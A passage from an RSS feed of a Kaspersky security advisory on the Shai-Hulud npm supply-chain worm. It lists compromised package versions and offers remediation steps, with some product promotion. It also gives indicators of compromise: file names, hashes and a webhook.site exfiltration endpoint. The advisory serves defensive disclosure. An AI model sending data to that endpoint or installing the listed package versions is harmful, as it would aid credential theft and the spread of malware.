  1745. <li>@crowdstrike/foundry-js versions 0.19.1, 0.19.2</li>
  1746. <li>@crowdstrike/glide-core versions 0.34.2, 0.34.3</li>
  1747. <li>@crowdstrike/logscale-dashboard versions 1.205.1, 1.205.2</li>
  1748. <li>@crowdstrike/logscale-file-editor versions 1.205.1, 1.205.2</li>
  1749. <li>@crowdstrike/logscale-parser-edit versions 1.205.1, 1.205.2</li>
  1750. <li>@crowdstrike/logscale-search versions 1.205.1, 1.205.2</li>
  1751. <li>@crowdstrike/tailwind-toucan-base versions 5.0.1, 5.0.2</li>
  1752. </ul>
<p>But the event that drew the most attention to this spreading threat was the infection of the @ctrl/tinycolor library, which sees more than two million downloads every week.</p>
  1754. <p>As mentioned above, the malicious script exposes an organization&#8217;s private repositories, posing a serious threat to their owners, as this creates a risk of exposing the source code of their libraries and products, among other things, and leading to an even greater loss of data.</p>
  1755. <h2 id="prevention-and-protection">Prevention and protection</h2>
  1756. <p>To protect against this type of infection, we recommend using a specialized solution for monitoring open-source components. Kaspersky maintains a <a href="https://www.kaspersky.com/open-source-feed?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9cfe10194bda62de" target="_blank" rel="noopener">continuous feed of compromised packages and libraries</a>, which can be used to secure your supply chain and protect development from similar threats.</p>
  1757. <p>For personal devices, we recommend <a href="https://www.kaspersky.com/premium?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kprem____311534b86c615e6e" target="_blank" rel="noopener">Kaspersky Premium</a>, which provides multi-layered protection to prevent and neutralize infection threats. Our solution can also restore the device&#8217;s functionality if it&#8217;s infected with malware.</p>
  1758. <p>For corporate devices, we advise implementing a comprehensive solution like <a href="https://www.kaspersky.com/enterprise-security/xdr?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___xdr____33801aaaec3e63b3" target="_blank" rel="noopener">Kaspersky Next</a>, which allows you to build a flexible and effective security system. This product line provides threat visibility and real-time protection, as well as EDR and XDR capabilities for investigation and response. It is suitable for organizations of any scale or industry.</p>
  1759. <p>Kaspersky products detect the Shai-Hulud threat as <code>HEUR:Worm.Script.Shulud.gen</code>.</p>
  1760. <p>In the event of a Shai-Hulud infection, and as a proactive response to the spreading threat, we recommend taking the following measures across your systems and infrastructure:</p>
  1761. <ul>
  1762. <li>Use a reliable security solution to conduct a full system scan.</li>
  1763. <li>Audit your GitHub repositories:</li>
  1764. <ul>
  1765. <li>Check for repositories named <code>shai-hulud</code>.</li>
  1766. <li>Look for non-trivial or unknown branches, pull requests, and files.</li>
  1767. <li>Audit GitHub Actions logs for strings containing <code>shai-hulud</code>.</li>
  1768. </ul>
  1769. <li>Reissue npm and GitHub tokens, cloud keys (specifically for AWS and Google Cloud Platform), and rotate other secrets.</li>
  1770. <li>Clear the cache and inventory your npm modules: check for malicious ones and roll back versions to clean ones.</li>
  1771. <li>Check for indicators of compromise, such as files in the system or network artifacts.</li>
  1772. </ul>
  1773. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1774. <p><strong>Files:</strong><br />
  1775. bundle.js<br />
  1776. shai-hulud-workflow.yml</p>
  1777. <p><strong>Strings:</strong><br />
  1778. shai-hulud</p>
  1779. <p><strong>Hashes:</strong><br />
  1780. <a href="https://opentip.kaspersky.com/c96fbbe010dd4c5bfb801780856ec228/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b82fb35982be9fef&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">C96FBBE010DD4C5BFB801780856EC228</a><br />
  1781. <a href="https://opentip.kaspersky.com/78e701f42b76ccde3f2678e548886860/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______2bd661a09cbb2bbb&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">78E701F42B76CCDE3F2678E548886860</a></p>
  1782. <p><strong>Network artifacts:</strong><br />
  1783. <a href="https://opentip.kaspersky.com/https%3a%2f%2fwebhook.site%2fbb8ca5f6-4175-45d2-b042-fc9ebb8170b7/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9bd279cc4ffc602e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7</a></p>
  1784. <p><strong>Compromised packages:</strong><br />
  1785. @ahmedhfarag/ngx-perfect-scrollbar<br />
  1786. @ahmedhfarag/ngx-virtual-scroller<br />
  1787. @art-ws/common<br />
  1788. @art-ws/config-eslint<br />
  1789. @art-ws/config-ts<br />
  1790. @art-ws/db-context<br />
  1791. @art-ws/di<br />
  1792. @art-ws/di-node<br />
  1793. @art-ws/eslint<br />
  1794. @art-ws/fastify-http-server<br />
  1795. @art-ws/http-server<br />
  1796. @art-ws/openapi<br />
  1797. @art-ws/package-base<br />
  1798. @art-ws/prettier<br />
  1799. @art-ws/slf<br />
  1800. @art-ws/ssl-info<br />
  1801. @art-ws/web-app<br />
  1802. @basic-ui-components-stc/basic-ui-components<br />
  1803. @crowdstrike/commitlint<br />
  1804. @crowdstrike/falcon-shoelace<br />
  1805. @crowdstrike/foundry-js<br />
  1806. @crowdstrike/glide-core<br />
  1807. @crowdstrike/logscale-dashboard<br />
  1808. @crowdstrike/logscale-file-editor<br />
  1809. @crowdstrike/logscale-parser-edit<br />
  1810. @crowdstrike/logscale-search<br />
  1811. @crowdstrike/tailwind-toucan-base<br />
  1812. @ctrl/deluge<br />
  1813. @ctrl/golang-template<br />
  1814. @ctrl/magnet-link<br />
  1815. @ctrl/ngx-codemirror<br />
  1816. @ctrl/ngx-csv<br />
  1817. @ctrl/ngx-emoji-mart<br />
  1818. @ctrl/ngx-rightclick<br />
  1819. @ctrl/qbittorrent<br />
  1820. @ctrl/react-adsense<br />
  1821. @ctrl/shared-torrent<br />
  1822. @ctrl/tinycolor<br />
  1823. @ctrl/torrent-file<br />
  1824. @ctrl/transmission<br />
  1825. @ctrl/ts-base32<br />
  1826. @nativescript-community/arraybuffers<br />
  1827. @nativescript-community/gesturehandler<br />
  1828. @nativescript-community/perms<br />
  1829. @nativescript-community/sentry<br />
  1830. @nativescript-community/sqlite<br />
  1831. @nativescript-community/text<br />
  1832. @nativescript-community/typeorm<br />
  1833. @nativescript-community/ui-collectionview<br />
  1834. @nativescript-community/ui-document-picker<br />
  1835. @nativescript-community/ui-drawer<br />
  1836. @nativescript-community/ui-image<br />
  1837. @nativescript-community/ui-label<br />
  1838. @nativescript-community/ui-material-bottom-navigation<br />
  1839. @nativescript-community/ui-material-bottomsheet<br />
  1840. @nativescript-community/ui-material-core<br />
  1841. @nativescript-community/ui-material-core-tabs<br />
  1842. @nativescript-community/ui-material-ripple<br />
  1843. @nativescript-community/ui-material-tabs<br />
  1844. @nativescript-community/ui-pager<br />
  1845. @nativescript-community/ui-pulltorefresh<br />
  1846. @nstudio/angular<br />
  1847. @nstudio/focus<br />
  1848. @nstudio/nativescript-checkbox<br />
  1849. @nstudio/nativescript-loading-indicator<br />
  1850. @nstudio/ui-collectionview<br />
  1851. @nstudio/web<br />
  1852. @nstudio/web-angular<br />
  1853. @nstudio/xplat<br />
  1854. @nstudio/xplat-utils<br />
  1855. @operato/board<br />
  1856. @operato/data-grist<br />
  1857. @operato/graphql<br />
  1858. @operato/headroom<br />
  1859. @operato/help<br />
  1860. @operato/i18n<br />
  1861. @operato/input<br />
  1862. @operato/layout<br />
  1863. @operato/popup<br />
  1864. @operato/pull-to-refresh<br />
  1865. @operato/shell<br />
  1866. @operato/styles<br />
  1867. @operato/utils<br />
  1868. @teselagen/bio-parsers<br />
  1869. @teselagen/bounce-loader<br />
  1870. @teselagen/file-utils<br />
  1871. @teselagen/liquibase-tools<br />
  1872. @teselagen/ove<br />
  1873. @teselagen/range-utils<br />
  1874. @teselagen/react-list<br />
  1875. @teselagen/react-table<br />
  1876. @teselagen/sequence-utils<br />
  1877. @teselagen/ui<br />
  1878. @thangved/callback-window<br />
  1879. @things-factory/attachment-base<br />
  1880. @things-factory/auth-base<br />
  1881. @things-factory/email-base<br />
  1882. @things-factory/env<br />
  1883. @things-factory/integration-base<br />
  1884. @things-factory/integration-marketplace<br />
  1885. @things-factory/shell<br />
  1886. @tnf-dev/api<br />
  1887. @tnf-dev/core<br />
  1888. @tnf-dev/js<br />
  1889. @tnf-dev/mui<br />
  1890. @tnf-dev/react<br />
  1891. @ui-ux-gang/devextreme-angular-rpk<br />
  1892. @ui-ux-gang/devextreme-rpk<br />
  1893. @yoobic/design-system<br />
  1894. @yoobic/jpeg-camera-es6<br />
  1895. @yoobic/yobi<br />
  1896. ace-colorpicker-rpk<br />
  1897. airchief<br />
  1898. airpilot<br />
  1899. angulartics2<br />
  1900. another-shai<br />
  1901. browser-webdriver-downloader<br />
  1902. capacitor-notificationhandler<br />
  1903. capacitor-plugin-healthapp<br />
  1904. capacitor-plugin-ihealth<br />
  1905. capacitor-plugin-vonage<br />
  1906. capacitorandroidpermissions<br />
  1907. config-cordova<br />
  1908. cordova-plugin-voxeet2<br />
  1909. cordova-voxeet<br />
  1910. create-hest-app<br />
  1911. db-evo<br />
  1912. devextreme-angular-rpk<br />
  1913. devextreme-rpk<br />
  1914. ember-browser-services<br />
  1915. ember-headless-form<br />
  1916. ember-headless-form-yup<br />
  1917. ember-headless-table<br />
  1918. ember-url-hash-polyfill<br />
  1919. ember-velcro<br />
  1920. encounter-playground<br />
  1921. eslint-config-crowdstrike<br />
  1922. eslint-config-crowdstrike-node<br />
  1923. eslint-config-teselagen<br />
  1924. globalize-rpk<br />
  1925. graphql-sequelize-teselagen<br />
  1926. json-rules-engine-simplified<br />
  1927. jumpgate<br />
  1928. koa2-swagger-ui<br />
  1929. mcfly-semantic-release<br />
  1930. mcp-knowledge-base<br />
  1931. mcp-knowledge-graph<br />
  1932. mobioffice-cli<br />
  1933. monorepo-next<br />
  1934. mstate-angular<br />
  1935. mstate-cli<br />
  1936. mstate-dev-react<br />
  1937. mstate-react<br />
  1938. ng-imports-checker<br />
  1939. ng2-file-upload<br />
  1940. ngx-bootstrap<br />
  1941. ngx-color<br />
  1942. ngx-toastr<br />
  1943. ngx-trend<br />
  1944. ngx-ws<br />
  1945. oradm-to-gql<br />
  1946. oradm-to-sqlz<br />
  1947. ove-auto-annotate<br />
  1948. pm2-gelf-json<br />
  1949. printjs-rpk<br />
  1950. react-complaint-image<br />
  1951. react-jsonschema-form-conditionals<br />
  1952. react-jsonschema-form-extras<br />
  1953. react-jsonschema-rxnt-extras<br />
  1954. remark-preset-lint-crowdstrike<br />
  1955. rxnt-authentication<br />
  1956. rxnt-healthchecks-nestjs<br />
  1957. rxnt-kue<br />
  1958. swc-plugin-component-annotate<br />
  1959. tbssnch<br />
  1960. teselagen-interval-tree<br />
  1961. tg-client-query-builder<br />
  1962. tg-redbird<br />
  1963. tg-seq-gen<br />
  1964. thangved-react-grid<br />
  1965. ts-gaussian<br />
  1966. ts-imports<br />
  1967. tvi-cli<br />
  1968. ve-bamreader<br />
  1969. ve-editor<br />
  1970. verror-extra<br />
  1971. voip-callkit<br />
  1972. wdio-web-reporter<br />
  1973. yargs-help-output<br />
  1974. yoo-styles</p>
  1975. ]]></content:encoded>
  1976. <wfw:commentRss>https://securelist.com/shai-hulud-worm-infects-500-npm-packages-in-a-supply-chain-attack/117547/feed/</wfw:commentRss>
  1977. <slash:comments>0</slash:comments>
  1978. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/25072805/shai-hulud-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  1979. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/25072805/shai-hulud-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1980. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/25072805/shai-hulud-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1981. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/25072805/shai-hulud-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1982. </item>
  1983. </channel>
  1984. </rss>
  1985.  
